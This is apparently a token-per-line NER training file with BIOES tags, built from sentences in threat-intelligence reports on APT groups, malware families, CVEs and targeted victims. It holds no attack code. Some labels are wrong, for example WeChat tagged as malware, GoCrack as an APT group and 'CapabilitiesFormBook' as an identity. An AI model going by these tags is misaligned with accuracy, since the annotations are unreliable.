+this O
+attack O
+in O
+the O
+wild O
+it O
+is O
+likely O
+that O
+there O
+is O
+an O
+additional O
+component O
+that O
+leads O
+to O
+the O
+execution O
+of O
+the O
+MSIL B-FILE
+payload E-FILE
+. O
+
+The O
+newer O
+variant O
+of O
+KopiLuwak S-FILE
+is O
+now O
+capable O
+of O
+exfiltrating O
+files O
+to O
+the O
+C&C S-TOOL
+as O
+well O
+as O
+downloading O
+files O
+and O
+saving O
+them O
+to O
+the O
+infected O
+machine O
+. O
+
+We O
+didn’t O
+choose O
+to O
+name O
+it O
+after O
+a O
+vegetable; O
+the O
+.NET B-FILE
+malware E-FILE
+developers O
+named O
+it O
+Topinambour S-FILE
+themselves O
+. O
+
+The O
+role O
+of O
+the O
+.NET B-FILE
+module E-FILE
+is O
+to O
+deliver O
+the O
+known O
+KopiLuwak B-FILE
+JavaScript E-FILE
+Trojan S-MAL
+. O
+
+RocketMan!” S-FILE
+(probably O
+a O
+reference O
+to O
+Donald O
+Trump’s O
+nickname O
+for O
+Kim O
+Jong O
+Un) O
+and O
+MiamiBeach” S-FILE
+serve O
+as O
+the O
+first O
+beacon O
+messages O
+from O
+the O
+victim O
+to O
+the O
+control O
+server O
+. O
+
+These O
+could O
+be O
+tools O
+to O
+circumvent O
+internet O
+censorship O
+, O
+such O
+as O
+Softether B-FILE
+VPN I-FILE
+4.12” E-FILE
+and O
+psiphon3” S-FILE
+, O
+or O
+Microsoft B-FILE
+Office I-FILE
+activators” E-FILE
+. O
+
+These O
+campaign-related O
+VPSs S-APT
+are O
+located O
+in O
+South S-LOC
+Africa S-LOC
+. O
+The O
+tool O
+does O
+all O
+that O
+a O
+typical O
+Trojan S-FILE
+needs O
+to O
+accomplish: O
+upload O
+, O
+download O
+and O
+execute O
+files O
+, O
+fingerprint O
+target O
+systems O
+. O
+
+The O
+PowerShell S-TOOL
+version O
+of O
+the O
+Trojan S-MAL
+also O
+has O
+the O
+ability O
+to O
+get O
+screenshots O
+. O
+
+The O
+Trojan S-FILE
+is O
+quite O
+similar O
+to O
+the O
+.NET B-FILE
+RocketMan I-FILE
+Trojan E-FILE
+and O
+can O
+handle O
+the O
+same O
+commands; O
+additionally O
+, O
+it O
+includes O
+the O
+#screen” O
+command O
+to O
+take O
+a O
+screenshot O
+. O
+
+Initial O
+reports O
+about O
+HIGHNOON S-FILE
+and O
+its O
+variants O
+reported O
+publicly O
+as O
+Winnti S-APT
+dating O
+back O
+to O
+at O
+least O
+2013 S-TIME
+indicated O
+the O
+tool O
+was O
+exclusive O
+to O
+a O
+single O
+group O
+, O
+contributing O
+to O
+significant O
+conflation O
+across O
+multiple O
+distinct O
+espionage O
+operations O
+. O
+
+BalkanRAT S-FILE
+enables O
+the O
+attacker O
+to O
+remotely O
+control O
+the O
+compromised O
+computer O
+via O
+a O
+graphical O
+interface O
+, O
+i.e. O
+, O
+manually; O
+BalkanDoor S-FILE
+enables O
+them O
+to O
+remotely O
+control O
+the O
+compromised O
+computer O
+via O
+a O
+command O
+line O
+, O
+i.e. O
+, O
+possibly O
+en O
+masse O
+. O
+
+Both O
+BalkanRAT S-FILE
+and O
+BalkanDoor S-FILE
+spread O
+in O
+Croatia S-LOC
+, O
+Serbia S-LOC
+, O
+Montenegro S-LOC
+, O
+and O
+Bosnia S-LOC
+and O
+Herzegovina S-LOC
+. O
+
+In O
+some O
+of O
+the O
+latest O
+samples O
+of O
+BalkanDoor S-FILE
+detected O
+in O
+2019 S-TIME
+, O
+the O
+malware O
+is O
+distributed O
+as O
+an O
+ACE O
+archive O
+, O
+disguised O
+as O
+a O
+RAR O
+archive O
+(i.e. O
+, O
+not O
+an O
+executable O
+file) O
+, O
+specially O
+crafted O
+to O
+exploit S-VULNAME
+the O
+WinRAR S-TOOL
+ACE O
+vulnerability O
+CVE-2018-20250 S-VULID
+. O
+
+The O
+backdoor S-FILE
+can O
+connect O
+to O
+any O
+of O
+the O
+C&Cs O
+from O
+a O
+hardcoded O
+list O
+– O
+a O
+measure O
+to O
+increase O
+resilience O
+. O
+
+The O
+main O
+part O
+of O
+the O
+BalkanRAT B-FILE
+malware E-FILE
+is O
+a O
+copy O
+of O
+the O
+Remote O
+Utilities O
+software O
+for O
+remote B-ACT
+access E-ACT
+. O
+
+China B-FILE
+Chopper E-FILE
+is O
+a O
+tool O
+that O
+allows O
+attackers S-APT
+to O
+remotely O
+control O
+the O
+target O
+system O
+that O
+needs O
+to O
+be O
+running O
+a O
+web O
+server O
+application O
+before O
+it O
+can O
+be O
+targeted O
+by O
+the O
+tool O
+. O
+
+China B-FILE
+Chopper E-FILE
+contains O
+a O
+remote O
+shell O
+( O
+Virtual B-TOOL
+Terminal E-TOOL
+) O
+function O
+that O
+has O
+a O
+first O
+suggested O
+command O
+of O
+netstat O
+an|find O
+ESTABLISHED O
+. O
+
+They O
+download O
+and O
+install O
+an O
+archive O
+containing O
+executables O
+and O
+trivially O
+modified O
+source O
+code O
+of O
+the O
+password-stealing O
+tool O
+Mimikatz B-FILE
+Lite E-FILE
+as O
+GetPassword.exe S-FILE
+. O
+
+The O
+tool S-FILE
+investigates O
+the O
+Local O
+Security O
+Authority O
+Subsystem O
+memory O
+space O
+in O
+order O
+to O
+find O
+, O
+decrypt O
+and O
+display O
+retrieved O
+passwords O
+. O
+
+The O
+China B-FILE
+Chopper E-FILE
+actor O
+activity O
+starts O
+with O
+the O
+download O
+and O
+execution O
+of O
+two O
+exploit S-VULNAME
+files O
+which O
+attempt O
+to O
+exploit S-VULNAME
+the O
+Windows S-OS
+vulnerabilities O
+CVE-2015-0062 S-VULID
+, O
+CVE-2015-1701 S-VULID
+and O
+CVE-2016-0099 S-VULID
+to O
+allow O
+the O
+attacker S-APT
+to O
+modify O
+other O
+objects O
+on O
+the O
+server O
+. O
+
+The O
+following O
+archive S-FILE
+caught O
+our O
+attention O
+for O
+exploiting O
+a O
+WinRAR S-TOOL
+unacev2 O
+module O
+vulnerability S-VULNAME
+and O
+for O
+having O
+interesting O
+content O
+. O
+
+Let’s O
+take O
+a O
+closer O
+look O
+at O
+ITG08’s S-APT
+TTPs O
+that O
+are O
+relevant O
+to O
+the O
+campaign O
+we O
+investigated O
+, O
+starting O
+with O
+its O
+spear B-ACT
+phishing E-ACT
+and O
+intrusion B-ACT
+tactics E-ACT
+and O
+covering B-ACT
+information E-ACT
+on O
+its O
+use O
+of O
+the O
+More_eggs B-FILE
+backdoor E-FILE
+. O
+
+Additional O
+capabilities O
+of O
+the O
+More_eggs B-FILE
+malware E-FILE
+include O
+the O
+download O
+and O
+execution O
+of O
+files O
+and O
+scripts O
+and O
+running O
+commands O
+using O
+cmd.exe S-FILE
+. O
+
+Based O
+on O
+this O
+, O
+we O
+believe O
+the O
+Rancor S-APT
+attackers S-APT
+were O
+targeting O
+political B-IDTY
+entities E-IDTY
+. O
+
+Other O
+groups S-APT
+, O
+such O
+as O
+Buhtrap S-APT
+, O
+Corkow S-MAL
+and O
+Carbanak S-APT
+, O
+were O
+already O
+known O
+to O
+target O
+and O
+successfully O
+steal O
+money O
+from O
+financial B-IDTY
+institutions E-IDTY
+and O
+their O
+customers S-IDTY
+in O
+Russia S-LOC
+. O
+
+Since O
+last O
+week O
+, O
+iSIGHT B-SECTEAM
+Partners E-SECTEAM
+has O
+worked O
+to O
+provide O
+details O
+on O
+the O
+power O
+outage O
+in O
+Ukraine S-LOC
+to O
+our O
+global O
+customers S-IDTY
+. O
+
+The O
+attacks O
+we O
+attribute O
+to O
+Scarlet B-APT
+Mimic E-APT
+have O
+primarily O
+targeted O
+Uyghur S-IDTY
+and O
+Tibetan B-IDTY
+activists E-IDTY
+as O
+well O
+as O
+those O
+who O
+are O
+interested O
+in O
+their O
+causes O
+. O
+
+The O
+most O
+recent O
+Scarlet B-ACT
+Mimic I-ACT
+attacks E-ACT
+we O
+have O
+identified O
+were O
+conducted O
+in O
+2015 S-TIME
+and O
+suggest O
+the O
+group O
+has O
+a O
+significant O
+interest O
+in O
+both O
+Muslim B-IDTY
+activists E-IDTY
+and O
+those O
+interested O
+in O
+critiques O
+of O
+the O
+Russian B-IDTY
+government E-IDTY
+and O
+Russian S-LOC
+President O
+Vladimir O
+Putin O
+. O
+
+Based O
+on O
+analysis O
+of O
+the O
+data O
+and O
+malware O
+samples O
+we O
+have O
+collected O
+, O
+Unit B-SECTEAM
+42 E-SECTEAM
+believes O
+the O
+attacks O
+described O
+herein O
+are O
+the O
+work O
+of O
+a O
+group O
+or O
+set O
+of O
+cooperating O
+groups S-APT
+who O
+have O
+a O
+single O
+mission O
+, O
+collecting O
+information O
+on O
+minority B-IDTY
+groups E-IDTY
+who O
+reside O
+in O
+and O
+around O
+northwestern B-LOC
+China E-LOC
+. O
+
+In O
+the O
+past O
+, O
+Scarlet B-APT
+Mimic E-APT
+has O
+primarily O
+targeted O
+individuals O
+who O
+belong O
+to O
+these O
+minority B-IDTY
+groups E-IDTY
+as O
+well O
+as O
+their O
+supporters S-IDTY
+, O
+but O
+we've O
+recently O
+found O
+evidence O
+to O
+indicate O
+the O
+group O
+also O
+targets O
+individuals O
+working O
+inside O
+government O
+anti-terrorist B-IDTY
+organizations E-IDTY
+. O
+
+Our O
+investigation O
+showed O
+that O
+these O
+attacks O
+were O
+targeted O
+, O
+and O
+that O
+the O
+threat O
+actor O
+sought O
+to O
+steal O
+communications O
+data O
+of O
+specific B-IDTY
+individuals E-IDTY
+in O
+various O
+countries O
+. O
+
+CapabilitiesFormBook S-IDTY
+is O
+a O
+data O
+stealer O
+, O
+but O
+not O
+a O
+full-fledged O
+banker S-IDTY
+. O
+
+While O
+discussions O
+of O
+threats O
+in O
+this O
+region O
+often O
+focus O
+on O
+" O
+North O
+America O
+" O
+generally O
+or O
+just O
+the O
+United O
+States O
+, O
+nearly O
+100 O
+campaigns S-ACT
+during O
+this O
+period O
+were O
+either O
+specifically O
+targeted O
+at O
+Canadian O
+organizations O
+or O
+were O
+customized O
+for O
+Canadian S-LOC
+audiences S-IDTY
+. O
+
+In O
+all O
+emails S-TOOL
+sent O
+to O
+these O
+government B-IDTY
+officials E-IDTY
+, O
+the O
+actor O
+used O
+the O
+same O
+attachment O
+: O
+a O
+malicious B-FILE
+Microsoft I-FILE
+Word I-FILE
+document E-FILE
+that O
+exploited O
+the O
+CVE-2012-0158 S-VULID
+vulnerability O
+to O
+drop O
+a O
+malicious O
+payload O
+. O
+
+In O
+this O
+latest O
+incident O
+, O
+the O
+group O
+registered O
+a O
+fake O
+news O
+domain O
+, O
+timesofindiaa.in O
+, O
+on O
+May B-TIME
+18 E-TIME
+, O
+2016 S-TIME
+, O
+and O
+then O
+used O
+it O
+to O
+send O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+Indian S-LOC
+government B-IDTY
+officials E-IDTY
+on O
+the O
+same O
+day O
+. O
+
+The O
+first O
+time O
+this O
+happened O
+was O
+at O
+the O
+beginning O
+of O
+the O
+month O
+, O
+when O
+Proofpoint S-SECTEAM
+researchers O
+blew O
+the O
+lid O
+off O
+a O
+cyber-espionage B-ACT
+campaign E-ACT
+named O
+Operation B-ACT
+Transparent I-ACT
+Tribe E-ACT
+, O
+which O
+targeted O
+the O
+Indian O
+embassies S-IDTY
+in O
+Saudi B-LOC
+Arabia E-LOC
+and O
+Kazakhstan S-LOC
+. O
+
+Back O
+in O
+February B-TIME
+2016 E-TIME
+, O
+Indian O
+army B-IDTY
+officials E-IDTY
+issued O
+a O
+warning O
+against O
+the O
+usage O
+of O
+three O
+apps O
+, O
+WeChat S-MAL
+, O
+SmeshApp S-MAL
+, O
+and O
+Line S-MAL
+, O
+fearing O
+that O
+these O
+apps O
+collected O
+too O
+much O
+information O
+if O
+installed O
+on O
+smartphones O
+used O
+by O
+Indian O
+army B-IDTY
+personnel E-IDTY
+. O
+
+According O
+to O
+the O
+security B-IDTY
+firm E-IDTY
+, O
+this O
+campaign O
+targeted O
+Indian O
+military B-IDTY
+officials E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+, O
+distributing O
+spyware O
+to O
+its O
+victims O
+via O
+an O
+Adobe B-TOOL
+Reader E-TOOL
+vulnerability S-VULNAME
+. O
+
+In O
+addition O
+to O
+these O
+, O
+the O
+Animal O
+Farm O
+attackers O
+used O
+at O
+least O
+one O
+unknown O
+, O
+mysterious O
+malware O
+during O
+an O
+operation O
+targeting O
+computer O
+users S-IDTY
+in O
+Burkina O
+Faso O
+. O
+
+PLATINUM S-APT
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+The O
+group O
+'s O
+persistent O
+use O
+of O
+spear B-ACT
+phishing I-ACT
+tactics E-ACT
+( O
+phishing S-ACT
+attempts O
+aimed O
+at O
+specific B-IDTY
+individuals E-IDTY
+) O
+and O
+access O
+to O
+previously O
+undiscovered O
+zero-day S-VULNAME
+exploits O
+have O
+made O
+it O
+a O
+highly O
+resilient O
+threat O
+. O
+
+Researching O
+this O
+attack O
+and O
+the O
+malware O
+used O
+therein O
+led O
+Microsoft S-IDTY
+to O
+discover O
+other O
+instances O
+of O
+PLATINUM S-APT
+attacking O
+users S-IDTY
+in O
+India S-LOC
+around O
+August B-TIME
+2015 E-TIME
+. O
+
+The O
+Poseidon B-APT
+Group E-APT
+actively O
+targets O
+this O
+sort O
+of O
+corporate O
+environment O
+for O
+the O
+theft O
+of O
+intellectual O
+property O
+and O
+commercial O
+information O
+, O
+occasionally O
+focusing O
+on O
+personal O
+information O
+on O
+executives S-IDTY
+. O
+
+The O
+previous O
+two O
+volumes O
+of O
+the O
+Microsoft S-IDTY
+Security O
+Intelligence O
+Report O
+explored O
+the O
+activities S-ACT
+of O
+two O
+such O
+groups S-APT
+, O
+code-named O
+STRONTIUM S-APT
+and O
+PLATINUM S-APT
+, O
+which O
+used O
+previously O
+unknown O
+vulnerabilities O
+and O
+aggressive O
+, O
+persistent O
+techniques O
+to O
+target O
+specific B-IDTY
+individuals E-IDTY
+and O
+institutions S-IDTY
+— O
+often O
+including O
+military S-IDTY
+installations O
+, O
+intelligence B-IDTY
+agencies E-IDTY
+, O
+and O
+other O
+government S-IDTY
+bodies O
+. O
+
+Mark B-IDTY
+Zuckerberg E-IDTY
+, O
+Jack B-IDTY
+Dorsey E-IDTY
+, O
+Sundar B-IDTY
+Pichai E-IDTY
+, O
+and O
+Daniel B-IDTY
+Ek E-IDTY
+— O
+the O
+CEOs S-IDTY
+of O
+Facebook S-IDTY
+, O
+Twitter S-IDTY
+, O
+Google S-IDTY
+and O
+Spotify O
+, O
+respectively O
+— O
+have O
+also O
+fallen O
+victim O
+to O
+the O
+hackers O
+, O
+dispelling O
+the O
+notion O
+that O
+a O
+career O
+in O
+software O
+and O
+technology S-IDTY
+exempts O
+one O
+from O
+being O
+compromised O
+. O
+
+The O
+group O
+is O
+well O
+known O
+: O
+They O
+hijacked O
+WikiLeaks' S-SECTEAM
+DNS S-PROT
+last O
+month O
+shortly O
+after O
+they O
+took O
+over O
+HBO O
+'s O
+Twitter S-IDTY
+account O
+; O
+last O
+year O
+, O
+they O
+took O
+over O
+Mark B-IDTY
+Zuckerberg E-IDTY
+'s O
+Twitter S-IDTY
+and O
+Pinterest S-IDTY
+accounts O
+; O
+and O
+they O
+hit O
+both O
+BuzzFeed S-IDTY
+and O
+TechCrunch S-IDTY
+not O
+long O
+after O
+that O
+. O
+
+OurMine S-APT
+is O
+well O
+known O
+: O
+They O
+hijacked O
+WikiLeaks' S-SECTEAM
+DNS S-PROT
+last O
+month O
+shortly O
+after O
+they O
+took O
+over O
+HBO O
+'s O
+Twitter S-IDTY
+account O
+; O
+last O
+year O
+, O
+they O
+took O
+over O
+Mark B-IDTY
+Zuckerberg E-IDTY
+'s O
+Twitter S-IDTY
+and O
+Pinterest S-IDTY
+accounts O
+; O
+and O
+they O
+hit O
+both O
+BuzzFeed S-IDTY
+and O
+TechCrunch S-IDTY
+not O
+long O
+after O
+that O
+. O
+
+Probably O
+the O
+most O
+high-profile O
+attack O
+that O
+GandCrab S-MAL
+was O
+behind O
+is O
+a O
+series O
+of O
+infections O
+at O
+customers S-IDTY
+of O
+remote O
+IT B-IDTY
+support I-IDTY
+firms E-IDTY
+in O
+the O
+month O
+of O
+February O
+. O
+
+Further O
+tracking O
+of O
+the O
+Lazarus’s S-APT
+activities O
+has O
+enabled O
+Kaspersky S-SECTEAM
+researchers O
+to O
+discover O
+a O
+new O
+operation O
+, O
+active O
+since O
+at O
+least O
+November B-TIME
+2018 E-TIME
+, O
+which O
+utilizes O
+PowerShell S-MAL
+to O
+control O
+Windows S-OS
+systems O
+and O
+Mac O
+OS O
+malware O
+to O
+target O
+Apple B-IDTY
+customers E-IDTY
+. O
+
+Users S-IDTY
+who O
+failed O
+to O
+patch O
+their O
+systems O
+may O
+find O
+themselves O
+mining O
+cryptocurrency O
+for O
+threat O
+actors S-APT
+. O
+
+Keeping O
+in O
+mind O
+the O
+sensitivity O
+of O
+passwords O
+, O
+GoCrack S-APT
+includes O
+an O
+entitlement-based O
+system O
+that O
+prevents O
+users O
+from O
+accessing O
+task O
+data O
+unless O
+they O
+are O
+the O
+original O
+creator O
+or O
+they O
+grant O
+additional B-IDTY
+users E-IDTY
+to O
+the O
+task O
+. O
+
+The O
+threat O
+actor’s S-APT
+emails S-TOOL
+usually O
+contain O
+a O
+picture O
+or O
+a O
+link O
+without O
+a O
+malicious B-FILE
+payload E-FILE
+and O
+are O
+sent O
+out O
+to O
+a O
+huge O
+recipient O
+database O
+of O
+up O
+to O
+85 O
+, O
+000 O
+users S-IDTY
+. O
+
+The O
+admin@338 S-APT
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+This O
+week O
+the O
+experts O
+at O
+FireEye S-SECTEAM
+discovered O
+that O
+a O
+group O
+of O
+Chinese-based S-LOC
+hackers O
+called O
+admin@338 S-APT
+had O
+sent O
+multiple O
+MH370-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+, O
+the O
+attackers S-APT
+targeted O
+government B-IDTY
+officials E-IDTY
+in O
+Asia-Pacific S-LOC
+, O
+it O
+is O
+likely O
+for O
+cyber B-APT
+espionage E-APT
+purpose O
+. O
+
+The O
+attackers S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+admin@338 S-APT
+used O
+the O
+popular O
+Poison B-MAL
+Ivy I-MAL
+RAT E-MAL
+and O
+WinHTTPHelper S-MAL
+malware S-MAL
+to O
+compromise O
+the O
+computers O
+of O
+government B-IDTY
+officials E-IDTY
+. O
+
+The O
+group O
+previous O
+activities S-ACT
+against O
+financial S-IDTY
+and O
+policy B-IDTY
+organizations E-IDTY
+have O
+largely O
+focused O
+on O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+written O
+in O
+English O
+, O
+destined O
+for O
+Western S-LOC
+audiences S-IDTY
+. O
+
+The O
+targets O
+were O
+similar O
+to O
+a O
+2015 S-TIME
+TG-4127 B-ACT
+campaign E-ACT
+— O
+individuals O
+in O
+Russia S-LOC
+and O
+the O
+former B-LOC
+Soviet E-LOC
+states O
+, O
+current O
+and O
+former O
+military S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+in O
+the O
+U.S. S-LOC
+and O
+Europe S-LOC
+, O
+individuals O
+working O
+in O
+the O
+defense S-IDTY
+and O
+government S-IDTY
+supply O
+chain O
+, O
+and O
+authors S-IDTY
+and O
+journalists S-IDTY
+— O
+but O
+also O
+included O
+email S-ACT
+accounts O
+linked O
+to O
+the O
+November B-TIME
+2016 E-TIME
+United B-LOC
+States E-LOC
+presidential O
+election O
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+, O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+and O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+APT28 S-APT
+targets O
+Russian S-LOC
+rockers S-IDTY
+and O
+dissidents B-IDTY
+Pussy I-IDTY
+Riot E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+We O
+have O
+reasons O
+to O
+believe O
+that O
+the O
+operators S-APT
+of O
+the O
+APT28 S-APT
+network O
+are O
+either O
+Russian S-LOC
+citizens S-IDTY
+or O
+citizens S-IDTY
+of O
+a O
+neighboring O
+country O
+that O
+speak O
+Russian S-LOC
+. O
+
+Russian S-LOC
+citizens—journalists S-IDTY
+, O
+software B-IDTY
+developers E-IDTY
+, O
+politicians S-IDTY
+, O
+researchers B-IDTY
+at I-IDTY
+universities E-IDTY
+, O
+and O
+artists S-IDTY
+are O
+also O
+targeted O
+by O
+Pawn B-APT
+Storm E-APT
+. O
+
+In O
+addition O
+to O
+focused O
+targeting O
+of O
+the O
+private O
+sector O
+with O
+ties O
+to O
+Vietnam S-LOC
+, O
+APT32 S-APT
+has O
+also O
+targeted O
+foreign O
+governments S-IDTY
+, O
+as O
+well O
+as O
+Vietnamese S-LOC
+dissidents S-IDTY
+and O
+journalists S-IDTY
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+In O
+2014 S-TIME
+, O
+APT32 S-APT
+leveraged O
+a O
+spear-phishing S-ACT
+attachment E-ACT
+titled O
+" O
+Plans O
+to O
+crackdown O
+on O
+protesters O
+at O
+the O
+Embassy O
+of O
+Vietnam.exe S-FILE
+, O
+" O
+which O
+targeted O
+dissident O
+activity O
+among O
+the O
+Vietnamese S-LOC
+diaspora S-IDTY
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+In O
+2017 S-TIME
+, O
+social B-IDTY
+engineering E-IDTY
+content O
+in O
+lures O
+used O
+by O
+the O
+actor S-APT
+provided O
+evidence O
+that O
+they O
+were O
+likely O
+used O
+to O
+target O
+members O
+of O
+the O
+Vietnam S-LOC
+diaspora S-IDTY
+in O
+Australia S-LOC
+as O
+well O
+as O
+government B-IDTY
+employees E-IDTY
+in O
+the O
+Philippines S-LOC
+. O
+
+APT33 S-APT
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+employees S-IDTY
+whose O
+jobs O
+related O
+to O
+the O
+aviation B-IDTY
+industry E-IDTY
+. O
+
+APT37 S-APT
+targeted O
+a O
+research B-IDTY
+fellow E-IDTY
+, O
+advisory B-IDTY
+member E-IDTY
+, O
+and O
+journalist S-IDTY
+associated O
+with O
+different O
+North B-LOC
+Korean E-LOC
+human O
+rights O
+issues O
+and O
+strategic B-IDTY
+organizations E-IDTY
+. O
+
+The O
+majority O
+of O
+APT37 B-ACT
+activity E-ACT
+continues O
+to O
+target O
+South B-LOC
+Korea E-LOC
+, O
+North B-LOC
+Korean E-LOC
+defectors S-IDTY
+, O
+and O
+organizations O
+and O
+individuals O
+involved O
+in O
+Korean B-LOC
+Peninsula E-LOC
+reunification O
+efforts O
+. O
+
+In O
+May B-TIME
+2017 E-TIME
+, O
+APT37 S-APT
+used O
+a O
+bank O
+liquidation O
+letter O
+as O
+a O
+spear B-ACT
+phishing I-ACT
+lure E-ACT
+against O
+a O
+board B-IDTY
+member E-IDTY
+of O
+a O
+Middle B-LOC
+Eastern E-LOC
+financial B-IDTY
+company E-IDTY
+. O
+
+Per O
+the O
+complaint O
+, O
+the O
+email S-ACT
+account O
+watsonhenny@gmail.com S-EMAIL
+was O
+used O
+to O
+send O
+LinkedIn O
+invitations O
+to O
+employees S-IDTY
+of O
+a O
+bank O
+later O
+targeted O
+by O
+APT38 S-APT
+. O
+
+The O
+APT38 S-APT
+uses O
+DYEPACK S-MAL
+to O
+manipulate O
+the O
+SWIFT O
+transaction O
+records O
+and O
+hide O
+evidence O
+of O
+the O
+malicious O
+transactions O
+, O
+so O
+bank B-IDTY
+personnel E-IDTY
+are O
+none O
+the O
+wiser O
+when O
+they O
+review O
+recent O
+transactions O
+. O
+
+APT39 S-APT
+'s O
+focus O
+on O
+the O
+telecommunications B-IDTY
+and I-IDTY
+travel I-IDTY
+industries E-IDTY
+suggests O
+intent O
+to O
+perform O
+monitoring O
+, O
+tracking O
+, O
+or O
+surveillance O
+operations O
+against O
+specific B-IDTY
+individuals E-IDTY
+, O
+collect O
+proprietary O
+or O
+customer O
+data O
+for O
+commercial O
+or O
+operational O
+purposes O
+that O
+serve O
+strategic O
+requirements O
+related O
+to O
+national O
+priorities O
+, O
+or O
+create O
+additional O
+accesses O
+and O
+vectors O
+to O
+facilitate O
+future O
+campaigns S-ACT
+. O
+
+Other O
+groups S-APT
+attributed O
+to O
+Iranian S-LOC
+attackers S-APT
+, O
+such O
+as O
+Rocket B-APT
+Kitten E-APT
+, O
+have O
+targeted O
+Iranian S-LOC
+individuals O
+in O
+the O
+past O
+, O
+including O
+anonymous B-IDTY
+proxy I-IDTY
+users E-IDTY
+, O
+researchers S-IDTY
+, O
+journalists S-IDTY
+, O
+and O
+dissidents S-IDTY
+. O
+
+We O
+believe O
+that O
+the O
+Carbanak S-MAL
+campaign O
+is O
+a O
+clear O
+indicator O
+of O
+a O
+new O
+era O
+in O
+cybercrime O
+in O
+which O
+criminals S-APT
+use O
+APT B-ACT
+techniques E-ACT
+directly O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+instead O
+of O
+through O
+its O
+customers S-IDTY
+. O
+
+Carbanak S-MAL
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+The O
+group O
+has O
+its O
+origin O
+in O
+more O
+common O
+financial O
+fraud O
+including O
+theft O
+from O
+consumer S-IDTY
+and O
+corporate O
+bank O
+accounts O
+in O
+Europe S-LOC
+and O
+Russia S-LOC
+, O
+using O
+standard O
+banking O
+malware O
+, O
+mainly O
+Carberp S-MAL
+. O
+
+Gallmaker S-APT
+'s O
+targets O
+are O
+embassies S-IDTY
+of O
+an O
+Eastern B-LOC
+European E-LOC
+country O
+. O
+
+However O
+, O
+in O
+September S-TIME
+last O
+year O
+, O
+our O
+friends O
+at O
+CSIS S-SECTEAM
+published O
+a O
+blog O
+detailing O
+a O
+new O
+Carbanak S-MAL
+variant O
+affecting O
+one O
+of O
+its O
+customers S-IDTY
+. O
+
+360 S-SECTEAM
+and O
+Tuisec S-SECTEAM
+already O
+identified O
+some O
+Gorgon B-APT
+Group E-APT
+members S-IDTY
+. O
+
+Symantec S-SECTEAM
+also O
+confirmed O
+seeing O
+the O
+Lazarus S-APT
+wiper O
+tool O
+in O
+Poland S-LOC
+at O
+one O
+of O
+their O
+customers S-IDTY
+. O
+
+This O
+new O
+campaign O
+, O
+dubbed O
+HaoBao S-ACT
+, O
+resumes O
+Lazarus S-APT
+' O
+previous O
+phishing B-ACT
+emails S-TOOL
+, O
+posed O
+as O
+employee O
+recruitment O
+, O
+but O
+now O
+targets O
+Bitcoin B-IDTY
+users E-IDTY
+and O
+global O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+Beginning O
+in O
+2017 S-TIME
+, O
+the O
+Lazarus B-APT
+group E-APT
+heavily O
+targeted O
+individuals O
+with O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+impersonating O
+job B-IDTY
+recruiters E-IDTY
+which O
+contained O
+malicious O
+documents O
+. O
+
+We O
+concluded O
+that O
+Lazarus B-APT
+Group E-APT
+was O
+responsible O
+for O
+WannaCry S-MAL
+, O
+a O
+destructive O
+attack O
+in O
+May S-TIME
+that O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+. O
+
+The O
+targeting O
+of O
+this O
+individual S-IDTY
+suggests O
+the O
+actors S-APT
+are O
+interested O
+in O
+breaching O
+the O
+French O
+Ministry O
+of O
+Foreign O
+Affairs O
+itself O
+or O
+gaining O
+insights O
+into O
+relations O
+between O
+France S-LOC
+and O
+Taiwan S-LOC
+. O
+
+On O
+November B-TIME
+10 I-TIME
+, I-TIME
+2015 E-TIME
+, O
+threat O
+actors S-APT
+sent O
+a O
+spear-phishing S-ACT
+email E-ACT
+to O
+an O
+individual S-IDTY
+at O
